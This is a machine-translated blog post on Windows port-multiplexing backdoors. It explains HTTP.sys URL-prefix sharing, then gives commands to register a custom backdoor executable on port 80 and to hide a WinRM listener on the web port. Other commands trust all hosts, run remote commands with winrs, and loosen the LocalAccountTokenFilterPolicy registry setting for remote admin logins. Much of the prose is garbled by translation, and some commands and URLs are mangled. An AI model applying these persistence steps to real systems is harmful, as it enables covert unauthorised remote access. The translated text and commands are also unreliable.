Knowledge add port multiplexed
About 0x01 port multiplexing
Port multiplexing technology is very old back door, mainly hijacking web server related processes / services of memory space, the system API or even hijack a network drive to achieve their goals,
In the implementation of winsocket, for the binding of multiple servers can be bound in determining who use multiple binding when, according to a principle who most clearly specify who will be submitted to the package, and there is no division of authority. Such multiple binding will be called a port complex.
Here is a summary of the port to take the back door driving rights based web service composition HTTP.sys.
0x02 Net.TCP Port Sharing
Reference: https: //docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing
Briefly, just introduced into the TCP / IP protocol, when, TCP / IP is assigned a unique 16-bit port number for each application through the protocol, thereby using port numbers to distinguish the application .
Deployment of applications using non-standard ports often because of the presence of a corporate firewall and personal firewall is complicated or even impossible.
Now use NET.TCP Port Sharing service offered by Microsoft, as long as the interface to follow development rules, you can achieve the same of different applications to share web server port .
In HTTP.SYS model, many communication applications in the different multiplexed HTTP multiplexed to a single TCP port. This model has become the standard on the Windows platform. This provides a common point of control for the firewall administrator, while allowing application developers to reduce the cost of deploying a new generation of applications can take advantage of the network as possible.
The ability to share ports between multiple HTTP applications has become a feature in Internet Information Services (IIS) is. However, it is only through the introduction of HTTP. Using this infrastructure completely widely IIS 6.0 SYS (kernel-mode HTTP protocol listener).
(1) when IIS or any other application using the HTTP Server API to monitor when the request path, these applications require HTTP.SYS registration url prefix above rules on registration of the URL, you can refer to the MSDN: https://msdn.microsoft. COM / EN-US / Library / Windows / Desktop / aa364698 (V = vs.85) .aspx . This is the registration process.
(2) When a request comes http.sys and acquired, it needs to distribute the request to register the current application corresponding to url , a process route.
So here, the concept of port multiplexing understanding is very simple, using a different Url HTTP Server API registration request address distribute different url request to enable port multiplexing to different applications by http.sys process, to achieve "a different application sharing port "Effect.
0x03 http.sys && WinRM
HTTP.sys driver
HTTP.sys driver is the main component of IIS
use
netsh http show servicestate
Command to view all url prefixes registered in HTTP.sys.
In fact, WinRM is to register the URL prefix wsman in HTTP.sys, the default listening port 5985. From this point, Microsoft announced WinRM architecture diagram can be seen.
0x04 port multiplexing forward to achieve the back door
condition:
Native support based Net.tcp Port Sharing of Web Application Development
First is a registered UrlPrefix format.
UrlPrefix format
UrlPrefix has the following syntax:
"Scheme: // host: port / relativeURI"
example:
"Http://www.cnblogs.com:80/-qing- /" "https://www.cnblogs.com:443/-qing-/ " "HTTPS: // at the beginning +: 80 / virtual root /"
Forward backdoor registration url
C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator\桌面\door\d oor.exe" http://192.168.5.35:80/qing_door/qing.html
Connected to the specified address
There is also a common pseudo-port multiplexing scenarios:
winsocket by default does not allow multiple bindings for the same address and port, we can bind:. 0.0.0.0 192.168.1. * and a local address and the like.
0x05 WinRM forward back door
WinRM Service
WinRM full name is Windows Remote Management, is part of Microsoft's server hardware management capabilities, can manage local or remote server. WinRM service allows administrators to remotely log on to Windows operating system, access to a Telnet-like interactive command line shell, but the underlying communication protocol using HTTP .
Open WinRM service
In the above Windows 2012 Server operating system, WinRM service default startup and listens for the 5985 port
For Windows 2008, the need to use the command to start the WinRM service, quick configuration and startup command is
winrm quickconfig -q
This command will automatically add a firewall exception rule after running, release 5985 port.
New 80-port Listener
For already open WinRM service machines, it was necessary to retain the original 5985 port listener, while the need to add a listener on port 80, so can guarantee the original 5985 administrators can use the port, we can connect 80 ports WinRM.
Use the following command to add a listener on port 80
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
For Windows 2012 server installation or later operating system and is concerned, just this one command to implement port multiplexing.
This time the original 5985 port still retains .
Modify the port 80:
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
After configuration, WinRM has a listener listens on port 80, at the same time, IIS web services can be fully operational.
Backdoor connection:
WinRM need to connect local service, first need to configure the WinRM service to start, then you need to set trust host connection, you can execute the following two commands.
winrm quickconfig -q winrm set winrm/config/Client @{TrustedHosts="*"}
Connection
Use winrs command to connect remotely execute commands WinRM service, and returns the result
winrs -r:https://www.cnblogs.com/-qing-/ -u:qing -p:xxxxx whoami
Can also be connected cmd get interactive shell.
WinRM service is also affected by the UAC, so there is only the local Administrators group administrator can log on, another administrator user is unable to log on remotely WinRM of. To allow other users to the local administrators group Log WinRM, you need to modify registry settings.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reference:
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/configuring-the-net-tcp-port-sharing-service
https://docs.microsoft.com/zh-cn/dotnet/framework/wcf/feature-details/net-tcp-port-sharing
http://mobile.51cto.com/hot-557084.htm
https://www.freebuf.com/articles/web/142628.html
https://www.secrss.com/articles/12696
https://msdn.microsoft.com/en-us/library/windows/desktop/aa364698(v=vs.85).aspx